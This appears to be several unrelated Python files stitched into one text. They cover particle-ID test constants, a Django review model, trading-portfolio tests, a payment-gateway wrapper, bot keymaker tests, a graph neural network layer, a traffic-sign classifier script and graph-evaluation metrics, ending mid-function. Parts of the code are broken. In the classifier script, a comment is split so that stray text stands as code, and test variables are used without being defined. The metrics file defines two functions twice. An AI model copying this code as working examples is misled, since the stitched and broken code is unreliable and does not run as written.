TQuark = 6
BPrimeQuark = 7 # 4th generation
TPrimeQuark = 8
# Quarkonia
jpsi = 443
psi_2S = 100443
Upsilon_1S = 553
Upsilon_4S = 300553
# Light hadrons
Pi0 = 111
PiPlus = 211
eta = 221
eta_prime = 331
a_0_1450_plus = 10211
KL = 130
KS = 310
KMinus = -321
rho_770_minus = -213
phi = 333
omega = 223
K1_1270_0 = 10313
K1_1400_0 = 20313
rho_1700_0 = 30113
a2_1320_minus = -215
omega_3_1670 = 227
f_4_2300 = 9010229 # example of a not-well-known meson
Proton = 2212
AntiNeutron = -2112
Lambda = 3122
Sigma0 = 3212
SigmaPlus = 3222
SigmaMinus = 3112
Xi0 = 3322
AntiXiMinus = -3312
OmegaMinus = 3334
# Charm hadrons
D0 = 421
DPlus = 411
DsPlus = 431
LcPlus = 4122
# Beauty hadrons
B0 = 511
BPlus = 521
Bs = 531
BcPlus = 541
Lb = 5122
# Top hadrons
T0 = 621
LtPlus = 6122
# Special particles
Graviton = 39
Reggeon = 110
Pomeron = 990
Odderon = 9990
# Supersymmetric particles
Gluino = 1000021
Gravitino = 1000039
STildeL = 1000003
CTildeR = 2000004
# R-hadrons
RPlus_TTildeDbar = 1000612
R0_GTildeG = 1000993
RPlusPlus_GTildeUUU = 1092224
# Q-balls
QBall1 = 10000150
QBall2 = -10000200
# Dyons
DyonSameMagElecChargeSign = 4110010
DyonOppositeMagElecChargeSign = 4120010
# Di-quarks
DD1 = 1103
SD0 = 3101
# Nuclei
HydrogenNucleus = 1000010010
Carbon12 = 1000060120
# Pentaquarks
AntiUCbarCUDPentaquark = -9422144
# example of spin 3/2 u-cbar-c-u-d pentaquark decaying to J/psi proton
UCbarCUDPentaquark = 9422144
# Technicolor
Pi0TC = 3000111
PiMinusTC = -3000211
# Composite quarks and leptons
UQuarkStar = 4000002
AntiElectronStar = -4000011
# Generator specific pseudoparticles or concepts
AntiCHadron = -84
# Invalid ID
Invalid1 = 0 # illegal ID
Invalid2 = 99999999 # general form is a 7-digit number
@pytest.fixture(scope="session")
def PDGIDs():
return PDGIDsEnum
|
<gh_stars>1-10
from __future__ import annotations
import os
import uuid
from django.db import models
from django.utils.deconstruct import deconstructible
from django.utils.translation import gettext_lazy as _
from ggongsul.member.models import Member
from ggongsul.visitation.models import Visitation
from ggongsul.partner.models import Partner
@deconstructible
class PathAndRename:
def __init__(self, sub_path):
self.path = sub_path
def __call__(self, instance: ReviewImage, filename: str):
ext = filename.split(".")[-1] # eg: 'jpg'
uid = uuid.uuid4().hex[:10] # eg: '567ae32f97'
renamed_filename = f"{uid}.{ext}"
return os.path.join(self.path, renamed_filename)
class Review(models.Model):
class RatingScore(models.IntegerChoices):
ONE = 1, _("⭐")
TWO = 2, _("⭐⭐")
THREE = 3, _("⭐⭐⭐")
FOUR = 4, _("⭐⭐⭐⭐")
FIVE = 5, _("⭐⭐⭐⭐⭐")
class ReviewType(models.IntegerChoices):
GGONGSUL = 1, _("꽁술")
NAVER = 2, _("네이버")
type = models.PositiveSmallIntegerField(
choices=ReviewType.choices, verbose_name=_("리뷰타입"), default=ReviewType.GGONGSUL
)
partner = models.ForeignKey(
Partner,
related_name="reviews",
null=True,
on_delete=models.SET_NULL,
verbose_name=_("업체"),
)
member = models.ForeignKey(
Member,
related_name="reviews",
null=True,
on_delete=models.SET_NULL,
verbose_name=_("작성자"),
)
visitation = models.OneToOneField(
Visitation,
related_name="review",
null=True,
on_delete=models.SET_NULL,
verbose_name=_("방문 기록"),
)
body = models.TextField(verbose_name=_("본문"))
rating_score = models.PositiveSmallIntegerField(
choices=RatingScore.choices, verbose_name=_("별점")
)
is_deleted = models.BooleanField(default=False, verbose_name=_("삭제 여부"))
deleted_on = models.DateTimeField(null=True, blank=True, verbose_name=_("삭제 날짜"))
created_on = models.DateTimeField(auto_now_add=True, verbose_name=_("생성 날짜"))
updated_on = models.DateTimeField(auto_now=True, verbose_name=_("최근 정보 변경 날짜"))
class Meta:
verbose_name = _("리뷰")
verbose_name_plural = _("리뷰")
def __str__(self):
return f"{self.member} 의 {self.partner} 업체 리뷰 {self.id}"
class ReviewImage(models.Model):
review = models.ForeignKey(
Review, related_name="images", null=True, on_delete=models.SET_NULL
)
image = models.ImageField(
upload_to=PathAndRename("/image/review/"),
verbose_name=_("리뷰 사진"),
)
created_on = models.DateTimeField(auto_now_add=True, verbose_name=_("생성 날짜"))
updated_on = models.DateTimeField(auto_now=True, verbose_name=_("최근 정보 변경 날짜"))
class Meta:
verbose_name = _("리뷰 이미지")
verbose_name_plural = _("리뷰 이미지")
def __str__(self):
return self.image.url
|
import os
import unittest
import datetime
from unittest import mock
from bullets.portfolio.portfolio import Portfolio
from bullets.portfolio.transaction import Transaction, Status
from bullets.data_source.data_source_interface import DataSourceInterface, Resolution
from bullets.data_source.data_source_fmp import FmpDataSource
class TestPortfolio(unittest.TestCase):
TIME = datetime.datetime(2021, 3, 10)
@mock.patch('bullets.data_source.data_source_interface.DataSourceInterface.get_price', return_value=1)
@mock.patch('bullets.portfolio.portfolio.Portfolio._get_slippage_price', return_value=1)
def test_buy_sell_long(self, mock_get_price, mock__get_slippage_price):
portfolio = Portfolio(1000, DataSourceInterface(), 25, 1)
transaction = portfolio.market_order("AAPL", 999)
self.assertEqual(Status.SUCCESSFUL, transaction.status)
self.assertEqual(0, portfolio.cash_balance)
transaction = portfolio.market_order("AAPL", -999)
self.assertEqual(Status.SUCCESSFUL, transaction.status)
self.assertEqual(998, portfolio.cash_balance)
self.assertEqual(0, len(portfolio.holdings))
self.assertEqual(2, len(portfolio.transactions))
@mock.patch('bullets.data_source.data_source_interface.DataSourceInterface.get_price', return_value=1)
@mock.patch('bullets.portfolio.portfolio.Portfolio._get_slippage_price', return_value=1)
def test_buy_sell_short(self, mock_get_price, mock__get_slippage_price):
portfolio = Portfolio(1000, DataSourceInterface(), 25, 1)
transaction = portfolio.market_order("AAPL", -1000)
self.assertEqual(Status.SUCCESSFUL, transaction.status)
self.assertEqual(1999, portfolio.cash_balance)
transaction = portfolio.market_order("AAPL", 1000)
self.assertEqual(Status.SUCCESSFUL, transaction.status)
self.assertEqual(0, len(portfolio.holdings))
self.assertEqual(2, len(portfolio.transactions))
@mock.patch('bullets.data_source.data_source_interface.DataSourceInterface.get_price', return_value=1)
@mock.patch('bullets.portfolio.portfolio.Portfolio._get_slippage_price', return_value=1)
def test_insufficient_funds(self, mock_get_price, mock__get_slippage_price):
portfolio = Portfolio(1000, DataSourceInterface(), 25, 1)
transaction = portfolio.market_order("AAPL", 2000)
self.assertEqual(Status.FAILED_INSUFFICIENT_FUNDS, transaction.status)
self.assertEqual(1000, portfolio.cash_balance)
self.assertEqual(0, len(portfolio.holdings))
self.assertEqual(1, len(portfolio.transactions))
def test_market_order(self):
data_source = FmpDataSource(os.getenv("FMP_TOKEN"), Resolution.MINUTE)
portfolio = Portfolio(1000, data_source, 25, 1)
portfolio.timestamp = datetime.datetime(2019, 3, 12, 15, 57)
data_source.timestamp = datetime.datetime(2019, 3, 12, 15, 57)
portfolio.market_order('AAPL', 5)
data_source.timestamp = datetime.datetime(2019, 3, 13, 15, 57)
portfolio.timestamp = datetime.datetime(2019, 3, 13, 15, 57)
self.assertEqual(1003.8499999999999, portfolio.update_and_get_balance())
def test_buy_stop_order(self):
data_source = FmpDataSource(os.getenv("FMP_TOKEN"), Resolution.MINUTE)
portfolio = Portfolio(1000, data_source, 25, 1)
data_source.timestamp = datetime.datetime(2021, 4, 14, 15, 57)
portfolio.timestamp = datetime.datetime(2021, 4, 14, 15, 57)
portfolio.buy_stop_order("AAPL", 5, 131)
portfolio.on_resolution()
price = data_source.get_price('AAPL')
self.assertEqual(1000, portfolio.update_and_get_balance())
data_source.timestamp = datetime.datetime(2021, 6, 14, 15, 57)
portfolio.timestamp = datetime.datetime(2021, 6, 14, 15, 57)
portfolio.on_resolution()
price = data_source.get_price('AAPL')
self.assertEqual(999.0, portfolio.update_and_get_balance())
def test_sell_stop_order(self):
data_source = FmpDataSource(os.getenv("FMP_TOKEN"), Resolution.MINUTE)
portfolio = Portfolio(1000, data_source, 25, 1)
data_source.timestamp = datetime.datetime(2021, 6, 14, 15, 57)
portfolio.timestamp = datetime.datetime(2021, 6, 14, 15, 57)
portfolio.sell_stop_order("AAPL", 5, 131)
portfolio.on_resolution()
price = data_source.get_price('AAPL')
self.assertEqual(1000, portfolio.update_and_get_balance())
data_source.timestamp = datetime.datetime(2021, 4, 14, 15, 57)
portfolio.timestamp = datetime.datetime(2021, 4, 14, 15, 57)
portfolio.on_resolution()
price = data_source.get_price('AAPL')
self.assertEqual(999.0000000000001, portfolio.update_and_get_balance())
def test_buy_limit_order(self):
data_source = FmpDataSource(os.getenv("FMP_TOKEN"), Resolution.MINUTE)
portfolio = Portfolio(1000, data_source, 25, 1)
data_source.timestamp = datetime.datetime(2021, 4, 14, 15, 57)
portfolio.timestamp = datetime.datetime(2021, 4, 14, 15, 57)
portfolio.buy_limit_order("AAPL", 5, 131)
portfolio.on_resolution()
price = data_source.get_price('AAPL')
self.assertEqual(1000, portfolio.update_and_get_balance())
data_source.timestamp = datetime.datetime(2021, 6, 14, 15, 57)
portfolio.timestamp = datetime.datetime(2021, 6, 14, 15, 57)
portfolio.on_resolution()
price = data_source.get_price('AAPL')
self.assertEqual(999.0, portfolio.update_and_get_balance())
def test_sell_limit_order(self):
data_source = FmpDataSource(os.getenv("FMP_TOKEN"), Resolution.MINUTE)
portfolio = Portfolio(1000, data_source, 25, 1)
data_source.timestamp = datetime.datetime(2021, 6, 14, 15, 57)
portfolio.timestamp = datetime.datetime(2021, 6, 14, 15, 57)
portfolio.sell_limit_order("AAPL", 5, 131)
portfolio.on_resolution()
price = data_source.get_price('AAPL')
self.assertEqual(1000, portfolio.update_and_get_balance())
data_source.timestamp = datetime.datetime(2021, 4, 14, 15, 57)
portfolio.timestamp = datetime.datetime(2021, 4, 14, 15, 57)
portfolio.on_resolution()
price = data_source.get_price('AAPL')
self.assertEqual(999.0000000000001, portfolio.update_and_get_balance())
if __name__ == '__main__':
unittest.main()
|
#!/usr/bin/env python
from typing import Dict
from decimal import Decimal
from uuid import uuid4
import requests
import json
# Internal Import
from sslcommerz_python_api.base import SSLCommerz
class SSLCSession(SSLCommerz):
def __init__(self,
sslc_is_sandbox: bool = True,
sslc_store_id: str = '',
sslc_store_pass: str = ''
) -> None:
"""[summary]
Args:
sslc_is_sandbox (bool, optional): Defines to use sandbox api or not. Defaults to True.
sslc_store_id (str, optional): Store ID from SSLCommerz. Defaults to ''.
sslc_store_pass (str, optional): Store Password for SSLCommerz store. Defaults to ''.
"""
super().__init__(sslc_is_sandbox, sslc_store_id, sslc_store_pass)
def set_urls(self,
success_url: str,
fail_url: str,
cancel_url: str,
ipn_url: str = ''
) -> None:
"""Sets urls for IPN
Args:
success_url (str): Success URL
fail_url (str): Fail URL
cancel_url (str): Cancel URL
ipn_url (str, optional): IPN URL. Defaults to ''.
"""
self.integration_data.update({
'success_url': success_url,
'fail_url': fail_url,
'cancel_url': cancel_url,
'ipn_url': ipn_url,
})
def set_product_integration(self,
total_amount: Decimal,
currency: str,
product_category: str,
product_name: str,
num_of_item: int,
shipping_method: str,
product_profile: str='None'
) -> None:
"""Set Product Integtration
Args:
total_amount (Decimal): Total Amount
currency (str): Currency
product_category (str): Peoduct's Category
product_name (str): Product's Name
num_of_item (int): Number of items
shipping_method (str): Shipping Method
product_profile (str, optional): Product's Description. Defaults to 'None'.
"""
self.integration_data.update({
'store_id': self.sslc_store_id,
'store_passwd': self.sslc_store_pass,
'tran_id': str(uuid4()),
'total_amount': total_amount,
'currency': currency,
'product_category': product_category,
'product_name': product_name,
'num_of_item': num_of_item,
'shipping_method': shipping_method,
'product_profile': product_profile,
})
def set_customer_info(self,
name: str,
email: str,
address1: str,
city: str,
postcode: str,
country: str,
phone: str,
address2: str=''
) -> None:
"""[summary]
Args:
name (str): Customer's Name
email (str): Customer's E-mail
address1 (str): Address
city (str): City
postcode (str): Postcode
country (str): Country
phone (str): Phone/Mobile Number
address2 (str, optional): Optional Address. Defaults to ''.
"""
self.integration_data.update({
'cus_name': name,
'cus_email': email,
'cus_add1': address1,
'cus_add2': address2,
'cus_city': city,
'cus_postcode': postcode,
'cus_country': country,
'cus_phone': phone,
})
def set_shipping_info(self,
shipping_to: str,
address: str,
city: str,
postcode: str,
country: str
) -> None:
"""Shipping Address
Args:
shipping_to (str): Customer's Name
address (str): Address
city (str): City
postcode (str): Postcode
country (str): Country
"""
self.integration_data.update({
'ship_name': shipping_to,
'ship_add1': address,
'ship_city': city,
'ship_postcode': postcode,
'ship_country': country,
})
def set_additional_values(self,
value_a: str = '',
value_b: str = '',
value_c: str = '',
value_d: str = ''
) -> None:
"""Additional Values
Args:
value_a (str, optional): Additional Value. Defaults to ''.
value_b (str, optional): Additional Value. Defaults to ''.
value_c (str, optional): Additional Value. Defaults to ''.
value_d (str, optional): Additional Value. Defaults to ''.
"""
self.integration_data.update({
'value_a': value_a,
'value_b': value_b,
'value_c': value_c,
'value_d': value_d,
})
def init_payment(self) -> Dict:
"""Initialize the Payment
Returns:
Dict: Response From SSLCommerz API
"""
post_url: str = self.sslc_session_api
post_data: Dict = self.integration_data
response_sslc = requests.post(post_url, post_data)
response_data: Dict[str, str] = {}
if response_sslc.status_code == 200:
response_json = json.loads(response_sslc.text)
if response_json['status'] == 'FAILED':
response_data.update({
'status': response_json['status'],
'failedreason': response_json['failedreason'],
})
return response_data
response_data.update({
'status': response_json['status'],
'sessionkey': response_json['sessionkey'],
'GatewayPageURL': response_json['GatewayPageURL'],
})
return response_data
response_json = json.loads(response_sslc.text)
response_data.update({
'status': response_json['status'],
'failedreason': response_json['failedreason'],
})
return response_data |
<reponame>rainbow-mind-machine/rainbow-mind-machine<gh_stars>1-10
import rainbowmindmachine as rmm
from unittest import TestCase
import logging
import os, subprocess
from .utils import captured_output
"""
Test Keymaker classes
"""
console = logging.StreamHandler()
console.setLevel(logging.DEBUG)
logging.getLogger('').addHandler(console)
thisdir = os.path.abspath(os.path.dirname(__file__))
class TestKeymaker(TestCase):
"""
Test the Keymaker class.
This focuses on testing the constructors
and the API key initialization process.
"""
@classmethod
def setUpClass(self):
self.keys_dir = os.path.join( thisdir, "test_keymaker_keys" )
self.api_keys = os.path.join( thisdir, "apikeys_fake.json" )
# Note: this gives the same outcome as
# hard-coding the path "tests"
def test_default_keymaker_apikeys_env(self):
"""
Test ability to create single key using consumer token from environment vars
"""
keymaker = rmm.TwitterKeymaker()
# Set application API keys
os.environ['CONSUMER_TOKEN'] = 'AAAAA'
os.environ['CONSUMER_TOKEN_SECRET'] = 'BBBBB'
keymaker.set_apikeys_env()
# Create bot API keys
with captured_output() as (out, err):
keymaker.make_a_key(
name = 'test_default_keymaker_apikeys_env',
json_target = 'test_default_keymaker_apikeys_env.json',
keys_out_dir = self.keys_dir,
interactive = False
)
# Clean up
os.environ['CONSUMER_TOKEN'] = ''
os.environ['CONSUMER_TOKEN_SECRET'] = ''
# Assert
output = out.getvalue().strip()
self.assertIn('Creating fake Twitter key', output)
def test_default_keymaker_apikeys_file(self):
"""
Test ability to create single key using consumer token/secret from JSON file
"""
keymaker = rmm.TwitterKeymaker()
# Set application API keys
keymaker.set_apikeys_file(self.api_keys)
# Create bot API keys
with captured_output() as (out, err):
keymaker.make_a_key(
name = 'test_default_keymaker_apikeys_file',
json_target = 'test_default_keymaker_apikeys_file.json',
keys_out_dir=self.keys_dir,
interactive=False
)
# Assert
output = out.getvalue().strip()
self.assertIn('Creating fake Twitter key', output)
def test_default_keymaker_apikeys_dict(self):
"""
Test ability to create single key using consumer token/secret from dictionary
"""
keymaker = rmm.TwitterKeymaker()
# Set application API keys
keymaker.set_apikeys_dict({
'consumer_token': 'AAAAA',
'consumer_token_secret': 'BBBBB'
})
# Create bot API keys
with captured_output() as (out, err):
keymaker.make_a_key(
name = 'test_default_keymaker_apikeys_dict',
json_target = 'test_default_keymaker_apikeys_dict.json',
keys_out_dir = self.keys_dir,
interactive = False
)
# Assert
output = out.getvalue().strip()
self.assertIn('Creating fake Twitter key', output)
@classmethod
def tearDownClass(self):
# Remove the keys directory we created
subprocess.call(['rm','-rf',self.keys_dir])
class TestFilesKeymaker(TestCase):
"""
Test file-based keymaker classes.
"""
@classmethod
def setUpClass(self):
self.keys_dir = os.path.join( thisdir, "test_keymaker_files_keys" )
self.api_keys = os.path.join( thisdir, "apikeys_fake.json" )
def test_files_keymaker(self):
"""
Test the FilesKeymaker, which makes one key
for each file with a given extension
in a given directory.
"""
keymaker = rmm.FilesKeymaker()
# Set application API keys
keymaker.set_apikeys_file(self.api_keys)
# Create bot API keys
# from files in filesdir
filesdir = os.path.join(thisdir,'files/')
with captured_output() as (out, err):
keymaker.make_keys(
filesdir,
keys_out_dir = self.keys_dir,
interactive = False
)
# Assert
output = out.getvalue().strip()
self.assertIn('Creating fake Twitter key', output)
def test_txt_keymaker(self):
"""
Test the TxtKeymaker, which makes one key
for each .txt file in a given directory.
"""
keymaker = rmm.TxtKeymaker()
# Set application API keys
keymaker.set_apikeys_file(self.api_keys)
# Create bot API keys
txtdir = os.path.join(thisdir,'txt/')
with captured_output() as (out, err):
keymaker.make_keys(
txtdir,
keys_out_dir = self.keys_dir,
interactive = False
)
# Assert
output = out.getvalue().strip()
self.assertIn('Creating fake Twitter key', output)
@classmethod
def tearDownClass(self):
# Remove the keys directory we created
subprocess.call(['rm','-rf',self.keys_dir])
|
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn.parameter import Parameter
from torch.nn import init
import dgl.function as fn
# Sends a message of node feature h
# Equivalent to => return {'m': edges.src['h']}
# randwalk_msg = fn.copy_src(src='h', out='m')
# def randwalk_reduce(nodes):
# accum = torch.mean(nodes.mailbox['m'], 1)
# return {'h': accum}
def sym_normalized_msg(edges):
return {'m': edges.src['h'] / (edges.src['out_deg'] * edges.dst['in_deg'])}
def sym_normalized_reduce(nodes):
accum = torch.sum(nodes.mailbox['m'], 1)
return {'h': accum}
'''
Formulation:
A^2XW_2 + AXW_1 + IXW_0
'''
class SoGCNLayer(nn.Module):
def __init__(self, in_dim, out_dim, activation, dropout, batch_norm, residual=False, order=2):
super().__init__()
self.in_channels = in_dim
self.out_channels = out_dim
self.batch_norm = batch_norm
self.residual = residual
self.max_order = order
if in_dim != out_dim:
self.residual = False
self.linears = nn.ModuleList([nn.Linear(in_dim, out_dim, bias=False) for _ in range(order + 1)])
self.bias = Parameter(torch.Tensor(out_dim))
self._init_bias()
self.batchnorm_h = nn.BatchNorm1d(out_dim)
self.activation = activation
self.dropout = nn.Dropout(dropout)
def _init_bias(self):
bound = 1 / math.sqrt(self.in_channels)
init.uniform_(self.bias, -bound, bound)
def _agg_readout_sum(self, outs):
h = torch.stack(outs, dim=0).sum(dim=0)
return h
def forward(self, g, node_feat, intermediate=None):
h_in = node_feat
if intermediate is not None:
intermediate(h_in, 'input')
g = g.local_var()
g.ndata['h'] = h_in
g.ndata['in_deg'] = torch.sqrt(g.in_degrees().float()).unsqueeze(-1).to(h_in.device) # Expand to N x 1
g.ndata['out_deg'] = torch.sqrt(g.out_degrees().float()).unsqueeze(-1).to(h_in.device) # Expand to N x 1
outs = []
for i in range(0, len(self.linears)):
h_o = self.linears[i](g.ndata['h'])
outs.append(h_o)
g.update_all(sym_normalized_msg, sym_normalized_reduce)
h = self._agg_readout_sum(outs)
h += self.bias
if intermediate is not None:
intermediate(h, 'linear_filter')
if self.batch_norm:
h = self.batchnorm_h(h) # batch normalization
if intermediate is not None:
intermediate(h, 'batch_norm')
if self.activation:
h = self.activation(h) # non-linear activation
if intermediate is not None:
intermediate(h, 'activation')
if self.residual:
h = h_in + h # residual connection
if intermediate is not None:
intermediate(h, 'residual_conn')
h = self.dropout(h)
return h
def __repr__(self):
return '{}(in_channels={}, out_channels={}, residual={}, max_order={}, activation={})'.format(
self.__class__.__name__,
self.in_channels, self.out_channels, self.residual,
self.max_order, self.activation)
|
import pandas as pd
import numpy as np
import tensorflow as tf
import random
import matplotlib.pyplot as plt
from sklearn.utils import shuffle
from tensorflow.contrib.layers import flatten
import csv
import cv2
from resizeimage import resizeimage
from PIL import Image
###### STEP 0: Load the Data ##############################################
# Load pickled data
import pickle
# TODO: Fill this in based on where you saved the training and testing data
training_file = "../traffic-signs-data/train.p"
validation_file = "../traffic-signs-data/train.p"
testing_file = "../traffic-signs-data/train.p"
with open(training_file, mode='rb') as f:
train = pickle.load(f)
with open(validation_file, mode='rb') as f:
valid = pickle.load(f)
with open(testing_file, mode='rb') as f:
test = pickle.load(f)
X_train, y_train = train['features'], train['labels']
X_valid, y_valid = valid['features'], valid['labels']
img = cv2.imread('../online-signs-data/sign1.jpg')
image = cv2.resize(img, (32,32))
image_shape = image.shape
print(image_shape)
###### STEP 1: Dataset Summary & Exploration ##############################
### Replace each question mark # image = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)
with the appropriate value.
### Use python, pandas or numpy methods rather than hard coding the results
# TODO: Number of training examples
n_train = len(X_train)
# TODO: Number of validation examples
n_validation = len(X_valid)
# TODO: Number of testing examples.
# n_test = len(X_test)
# for image in X_train:
# for image in X_valid:
# image = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)
# for image in X_test:
# image = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)
# TODO: What's the shape of an traffic sign image?
image_shape = X_train[0].shape
# TODO: How many unique classes/labels there are in the dataset.
f = open('../signnames.csv')
lines = f.readlines()
classes = []
for line in lines:
num_strs = line.split(',')
try:
label = float(num_strs[0])
except ValueError:
pass
else:
classes.append(label)
n_classes = len(classes)
print("Number of training examples =", n_train)
# print("Number of testing examples =", n_test)
print("Image data shape =", image_shape)
print("Number of classes =", n_classes)
index = random.randint(0, n_train)
image = X_train[index].squeeze()
plt.figure(figsize=(1,1))
plt.imshow(X_test, cmap="gray")
plt.savefig('../visual.jpg')
print(y_train[index])
######## STEP 2: Design and Test a Model Architecture ####################
X_train, y_train = shuffle(X_train, y_train)
EPOCHS = 10
BATCH_SIZE = 128
def LeNet(x):
# Arguments used for tf.truncated_normal, randomly defines variables for the weights and biases for each layer
mu = 0
sigma = 0.1
# SOLUTION: Layer 1: Convolutional. Input = 32x32x3. Output = 28x28x6.
conv1_W = tf.Variable(tf.truncated_normal(shape=(5, 5, 3, 6), mean = mu, stddev = sigma))
conv1_b = tf.Variable(tf.zeros(6))
conv1 = tf.nn.conv2d(x, conv1_W, strides=[1, 1, 1, 1], padding='VALID') + conv1_b
# SOLUTION: Activation.
conv1 = tf.nn.relu(conv1)
# SOLUTION: Pooling. Input = 28x28x6. Output = 14x14x6.
conv1 = tf.nn.max_pool(conv1, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='VALID')
# SOLUTION: Layer 2: Convolutional. Output = 10x10x16.
conv2_W = tf.Variable(tf.truncated_normal(shape=(5, 5, 6, 16), mean = mu, stddev = sigma))
conv2_b = tf.Variable(tf.zeros(16))
conv2 = tf.nn.conv2d(conv1, conv2_W, strides=[1, 1, 1, 1], padding='VALID') + conv2_b
# SOLUTION: Activation.
conv2 = tf.nn.relu(conv2)
# SOLUTION: Pooling. Input = 10x10x16. Output = 5x5x16.
conv2 = tf.nn.max_pool(conv2, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='VALID')
# SOLUTION: Flatten. Input = 5x5x16. Output = 400.
fc0 = flatten(conv2)
# SOLUTION: Layer 3: Fully Connected. Input = 400. Output = 120.
fc1_W = tf.Variable(tf.truncated_normal(shape=(400, 120), mean = mu, stddev = sigma))
fc1_b = tf.Variable(tf.zeros(120))
fc1 = tf.matmul(fc0, fc1_W) + fc1_b
# SOLUTION: Activation.
fc1 = tf.nn.relu(fc1)
# SOLUTION: Layer 4: Fully Connected. Input = 120. Output = 84.
fc2_W = tf.Variable(tf.truncated_normal(shape=(120, 84), mean = mu, stddev = sigma))
fc2_b = tf.Variable(tf.zeros(84))
fc2 = tf.matmul(fc1, fc2_W) + fc2_b
# SOLUTION: Activation.
fc2 = tf.nn.relu(fc2)
# SOLUTION: Layer 5: Fully Connected. Input = 84. Output = 43.
fc3_W = tf.Variable(tf.truncated_normal(shape=(84, n_classes), mean = mu, stddev = sigma))
fc3_b = tf.Variable(tf.zeros(n_classes))
logits = tf.matmul(fc2, fc3_W) + fc3_b
return logits
x = tf.placeholder(tf.float32, (None, 32, 32, 3))
y = tf.placeholder(tf.int32, (None))
one_hot_y = tf.one_hot(y, n_classes)
# Training pipeline
rate = 0.001
logits = LeNet(x)
cross_entropy = tf.nn.softmax_cross_entropy_with_logits(labels=one_hot_y, logits=logits)
loss_operation = tf.reduce_mean(cross_entropy)
optimizer = tf.train.AdamOptimizer(learning_rate = rate)
training_operation = optimizer.minimize(loss_operation)
#############################################################################################
# Model Evaluation
correct_prediction = tf.equal(tf.argmax(logits, 1), tf.argmax(one_hot_y, 1))
accuracy_operation = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
saver = tf.train.Saver()
def evaluate(X_data, y_data):
num_examples = len(X_data)
total_accuracy = 0
sess = tf.get_default_session()
for offset in range(0, num_examples, BATCH_SIZE):
batch_x, batch_y = X_data[offset:offset+BATCH_SIZE], y_data[offset:offset+BATCH_SIZE]
accuracy = sess.run(accuracy_operation, feed_dict={x: batch_x, y: batch_y})
total_accuracy += (accuracy * len(batch_x))
return total_accuracy / num_examples
# X_test = cv2.imread('../online-signs-data/sign1.jpg')
# Y_test = np.array([29])
with tf.Session() as sess:
saver.restore(sess, tf.train.latest_checkpoint('.'))
test_accuracy = evaluate(X_test, y_test)
print("Test Accuracy = {:.3f}".format(test_accuracy)) |
import numpy as np
import scipy
import sklearn.metrics
def precision_at_n(adj_test, adj_true, n):
assert (len(adj_test.shape) == 1) and (len(adj_true.shape) == 1), "Expect 1-dimensional arrays"
sorted_args = np.argsort(adj_test)[::-1]
return np.sum(adj_true[sorted_args][:n] > 0) / n
def true_positive(adj_test, adj_true, threshold=0.05):
assert (len(adj_test.shape) == 1) and (len(adj_true.shape) == 1), \
"Parameters should be one-dimensional"
return np.sum((adj_test > threshold) * (adj_true > 0))
def false_positive(adj_test, adj_true, threshold=0.05):
assert (len(adj_test.shape) == 1) and (len(adj_true.shape) == 1), \
"Parameters should be one-dimensional"
return np.sum((adj_test > threshold) * (adj_true == 0))
def false_negative(adj_test, adj_true, threshold=0.05):
assert (len(adj_test.shape) == 1) and (len(adj_true.shape) == 1), \
"Parameters should be one-dimensional"
return np.sum((adj_test <= threshold) * (adj_true > 0))
def true_negative(adj_test, adj_true, threshold=0.05):
assert (len(adj_test.shape) == 1) and (len(adj_true.shape) == 1), \
"Parameters should be one-dimensional"
return np.sum((adj_test <= threshold) * (adj_true == 0))
def tp(adj_test, adj_true, threshold=0.05):
return true_positive(adj_test, adj_true, threshold)
def fp(adj_test, adj_true, threshold=0.05):
return false_positive(adj_test, adj_true, threshold)
def tn(adj_test, adj_true, threshold=0.05):
return true_negative(adj_test, adj_true, threshold)
def fn(adj_test, adj_true, threshold=0.05):
return false_negative(adj_test, adj_true, threshold)
def recall(adj_test, adj_true, threshold=0.05):
tp_val = tp(adj_test, adj_true, threshold)
if tp_val == 0:
return tp_val
else:
tot = np.sum(adj_true > 0)
return tp_val / tot
def precision(adj_test, adj_true, threshold=0.05):
tp_val = tp(adj_test, adj_true, threshold)
if tp_val == 0:
return tp_val
else:
tot = np.sum(adj_test > threshold)
return tp_val / tot
def tpr(adj_test, adj_true, threshold=0.05):
return recall(adj_test, adj_true, threshold)
def fpr(adj_test, adj_true, threshold=0.05):
fp_val = fp(adj_test, adj_true, threshold)
if fp_val == 0:
return fp_val
else:
tot = np.sum(adj_true == 0)
return fp_val / tot
def tnr(adj_test, adj_true, threshold=0.05):
tn_val = tn(adj_test, adj_true, threshold)
if tn_val == 0:
return tn_val
else:
tot = np.sum(adj_true == 0)
return tn_val / tot
def fnr(adj_test, adj_true, threshold=0.05):
fn_val = fn(adj_test, adj_true, threshold)
if fn_val == 0:
return fn_val
else:
tot = np.sum(adj_true > 0)
return fn_val / tot
def fscore(adj_test, adj_true, threshold=0.05, beta=1.0):
rec_val = recall(adj_test, adj_true, threshold)
prec_val = precision(adj_test, adj_true, threshold)
if (rec_val == 0) and (prec_val == 0):
return 0.0
return (1 + beta ** 2) * prec_val * rec_val / (beta ** 2 * prec_val + rec_val)
def tpr(adj_test, adj_true, threshold=0.05):
return recall(adj_test, adj_true, threshold)
def fpr(adj_test, adj_true, threshold=0.05):
return fp(adj_test, adj_true, threshold) / np.sum(adj_true == 0)
def nrmse(adj_test, adj_true):
return np.sqrt(np.sum((adj_test - adj_true) ** 2)) / np.sum(adj_true ** 2)
def relerr(adj_test, adj_true, norm=True, null_norm='min'):
mask = adj_true > 0
n_nodes = adj_true.shape[0]
try:
if norm:
if null_norm == 'min':
rel_err = np.sum(np.abs(adj_test - adj_true)[mask] / adj_true[mask]) + np.abs(adj_test - adj_true)[~mask].sum() / adj_true[mask].min()
elif null_norm == 'none':
rel_err = np.sum(np.abs(adj_test - adj_true)[mask] / adj_true[mask]) + np.abs(adj_test - adj_true)[~mask].sum()
elif null_norm == 'ignore':
rel_err = np.sum(np.abs(adj_test - adj_true)[mask] / adj_true[mask])
elif isinstance(null_norm, float):
rel_err = np.sum(np.abs(adj_test - adj_true)[mask] / adj_true[mask]) + np.abs(adj_test - adj_true)[~mask].sum() / null_norm
else:
raise ValueError('Invalid norm')
else:
rel_err = np.sum(np.abs(adj_test - adj_true))
except Exception:
rel_err = np.nan
return rel_err / n_nodes
def pr_auc_score(adj_test, adj_true):
